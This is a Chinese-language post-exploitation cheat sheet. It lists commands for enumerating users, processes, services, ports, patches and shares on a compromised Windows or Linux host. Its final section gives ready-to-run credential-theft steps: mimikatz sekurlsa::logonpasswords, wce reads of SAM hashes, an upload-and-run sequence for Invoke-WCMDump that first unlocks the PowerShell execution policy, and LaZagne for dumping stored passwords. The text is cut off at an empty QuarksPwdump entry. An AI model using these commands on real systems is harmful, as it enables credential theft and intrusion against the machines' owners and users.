一、用户列表
windows:net user
linux:vim /etc/passwd
二、进程信息
windows:tasklist
杀死某个进程:taskkill /pid pid号 /f
linux:ps aux
top
三、服务类别
windows:net start
linux:chkconfig --list
service --status-all
四、端口列表
windows:netstat -ano
linux:查看所有得tcp端口:netstat -anpt
查看所有得tcp和udp端口:netstat -anptu
查看所有得开放端口:netstat -anptul
五、补丁列表
wndows:systeminfo
查看补丁的详细信息:wmic qfe list full
linux:查看系统内核:uname -a
查看具体程序的补丁情况:rpm -qa | grep ssh
六、本机共享
windows:net share
七、本地用户习惯
windows:可查看用户的家目录,比如以下文件
八、当前用户密码(这里的密码不止登陆密码,还有用户登录 一些网址的密码)
window:
1.mimikatz(在win2008服务器上)
输入:
mimikatz.exe privilege::debug
sekurlsa::logonpasswords 
2.wce
wce.exe -l 列出密码和凭证
wce -lv 读取sam文件的密码
3.lvoke-WCMDump
上传该脚本到win8服务器,利用win8自带得powershell,获取凭证用户名和密码
(1)修改策略为可加载 脚本
Set-ExecutionPolicy unrestricted 
(2)加载Invoke-WCMDump脚本
Import-Module .\Invoke-WCMDump.ps1 
(3)输入脚本名Ivoke-WCMDump运行
4.LaZagne
LaZagne是一款用于检索大量存储在本地计算机密码的开源应用程序。 因为每个软件储存密码的方式不尽相同(明文、API、定制算法、数据库等),所以该工具使用多种方法获取软件密码
lazagne.exe all 查看所有
5.QuarksPwdump
